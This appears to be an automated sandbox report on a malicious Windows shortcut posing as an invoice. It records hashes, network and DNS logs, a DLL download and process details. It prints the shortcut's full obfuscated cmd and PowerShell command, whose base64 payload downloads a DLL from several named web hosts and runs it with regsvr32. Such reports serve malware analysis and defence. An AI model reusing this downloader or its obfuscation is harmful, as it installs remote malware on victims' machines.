                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):365056
                                                                            Entropy (8bit):7.158107270371674
                                                                            Encrypted:false
                                                                            SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                                                            MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                                                            SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                                                            SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                                                            SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                                                            Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Thu May 19 18:45:55 2022, atime=Fri Feb 4 06:07:07 2022, length=289792, window=hidenormalshowminimized
                                                                              Entropy (8bit):3.753682067002701
                                                                              TrID:
                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                              File name:RechnungsDetails 2022.20.05_1044.lnk
                                                                              File size:3599
                                                                              MD5:235332fd9cf506fd4508ac0fb8d1b64a
                                                                              SHA1:514f37f2b32eb85d18588f44670830e355c69749
                                                                              SHA256:6a6547bc259080ecf6b26354da81caaa639216191f5a59d9cc088a2e9597e9c9
                                                                              SHA512:e048348c033e9d18678a44242e78edefb5efe24f279aa9e979466cda3142be4194edcdffd45d8a0dedbe82d0a916805e83e8f386cade90726185122d3aee6c15
                                                                              SSDEEP:48:8iMuTKt9pLXjFoByV2jGxHiBdb7mbtfcIsmkJgZfRAMI2aby:8iMuWt9pLpSycKxCBdb7bm4MR
                                                                              TLSH:3771CF393DD95118E1F3DF757CE9BA96CFA9B623B512495E008103064D51600EE96D3F
                                                                              File Content Preview:L..................F.... .....<.....S....k....<......l......................5....P.O. .:i.....+00.../C:\...................V.1......T....Windows.@........OwH.T!.....!.........................W.i.n.d.o.w.s.....Z.1......T.2..System32..B........OwH.T!.......
                                                                              Icon Hash:fc3cf4c4dcd9d9ed

                                                                              General

                                                                              Relative Path:
                                                                              Command Line Argument:/v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                                                              Icon location:shell32.dll
                                                                              Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                              May 23, 2022 08:54:13.480020046 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480031013 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.480096102 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480150938 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.480609894 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480647087 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480671883 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480695009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480704069 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.480731964 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.482904911 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.482954025 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.482980967 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483007908 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483033895 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483059883 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483087063 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483104944 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483114004 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483139992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483165979 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483179092 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483190060 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483196020 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483222961 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483247995 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483259916 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483275890 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483304024 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483316898 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483328104 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483336926 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483355045 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483380079 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483386993 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483406067 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483433008 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483441114 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483458996 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483484983 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483489990 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483510971 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483537912 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483544111 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483563900 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483589888 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483592033 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483613968 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483642101 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483644962 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483665943 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483688116 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483707905 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483726978 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483747005 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483758926 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483776093 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483781099 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483802080 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483825922 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483834982 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483895063 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.608314991 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608359098 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608428001 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608454943 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608464003 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.608515024 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609004974 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609035969 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609060049 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609083891 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609086037 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609106064 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609128952 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609137058 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609153032 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609174967 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609180927 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609230995 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.611896992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611932039 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611954927 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611979961 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611990929 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.612023115 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.613959074 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614000082 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614023924 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614048958 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614051104 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614072084 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614094973 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614098072 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614120007 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614132881 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614145041 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614167929 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614181042 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614192009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614216089 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614243984 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614244938 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614269018 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614290953 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614291906 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614315987 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614339113 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614339113 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614363909 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614382029 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614389896 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614438057 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614460945 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614460945 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614484072 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614506960 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614509106 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614531040 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614543915 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614554882 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614578009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614593029 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614602089 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614624977 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614649057 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614650011 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614672899 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614696026 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614696980 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614722013 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614734888 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614743948 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614782095 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.736660957 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736706972 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736727953 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736748934 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736836910 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737138987 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737168074 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737190008 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737214088 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737241030 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737298965 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737581968 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737612009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737633944 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737656116 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737663031 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737705946 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.740108013 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740142107 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740164995 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740189075 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740231037 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.740263939 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.742799997 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742830992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742856026 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742894888 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.742913961 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742939949 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742964029 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742978096 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.743031025 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744553089 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744597912 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744630098 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744658947 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744688988 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744690895 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744708061 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744748116 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744796038 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744800091 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744831085 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744862080 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744885921 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744891882 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744923115 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744934082 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744954109 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744985104 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745001078 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745011091 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745038986 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745054960 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745063066 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745089054 CEST804975498.142.105.106192.168.2.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| May 23, 2022 08:54:12.413779974 CEST | 54322 | 53 | 192.168.2.5 | 8.8.8.8 |
| May 23, 2022 08:54:12.551898956 CEST | 53 | 54322 | 8.8.8.8 | 192.168.2.5 |
| May 23, 2022 08:54:12.559169054 CEST | 62704 | 53 | 192.168.2.5 | 8.8.8.8 |
| May 23, 2022 08:54:12.697422028 CEST | 53 | 62704 | 8.8.8.8 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- |
| May 23, 2022 08:54:12.413779974 CEST | 192.168.2.5 | 8.8.8.8 | 0xb7e3 | Standard query (0) | www.jsonsintl.com | A (IP address) | IN (0x0001) |
| May 23, 2022 08:54:12.559169054 CEST | 192.168.2.5 | 8.8.8.8 | 0x4ea1 | Standard query (0) | www.jsonsintl.com | A (IP address) | IN (0x0001) |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| May 23, 2022 08:54:12.551898956 CEST | 8.8.8.8 | 192.168.2.5 | 0xb7e3 | No error (0) | www.jsonsintl.com | jsonsintl.com | | CNAME (Canonical name) | IN (0x0001) |
| May 23, 2022 08:54:12.551898956 CEST | 8.8.8.8 | 192.168.2.5 | 0xb7e3 | No error (0) | jsonsintl.com | | 98.142.105.106 | A (IP address) | IN (0x0001) |
| May 23, 2022 08:54:12.697422028 CEST | 8.8.8.8 | 192.168.2.5 | 0x4ea1 | No error (0) | www.jsonsintl.com | jsonsintl.com | | CNAME (Canonical name) | IN (0x0001) |
| May 23, 2022 08:54:12.697422028 CEST | 8.8.8.8 | 192.168.2.5 | 0x4ea1 | No error (0) | jsonsintl.com | | 98.142.105.106 | A (IP address) | IN (0x0001) |

                                                                              • www.jsonsintl.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
| --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.5 | 49754 | 98.142.105.106 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

Timestamp:May 23, 2022 08:54:12.907315016 CEST
kBytes transferred:443
Direction:OUT
Data:
GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: www.jsonsintl.com
Connection: Keep-Alive

Timestamp:May 23, 2022 08:54:13.094686031 CEST
kBytes transferred:511
Direction:IN
Data:
HTTP/1.1 200 OK
Date: Mon, 23 May 2022 06:54:12 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Mon, 23 May 2022 06:54:13 GMT
Content-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 628b2f9502924=1653288853; expires=Mon, 23-May-2022 06:55:13 GMT; Max-Age=60; path=/
Last-Modified: Mon, 23 May 2022 06:54:13 GMT
Content-Length: 365056
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive
Content-Type: application/x-msdownload



                                                                              Target ID:0
                                                                              Start time:08:54:03
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:1
                                                                              Start time:08:54:04
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:2
                                                                              Start time:08:54:05
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                                                              Imagebase:0x7ff619710000
                                                                              File size:447488 bytes
                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Reputation:high

                                                                              Target ID:3
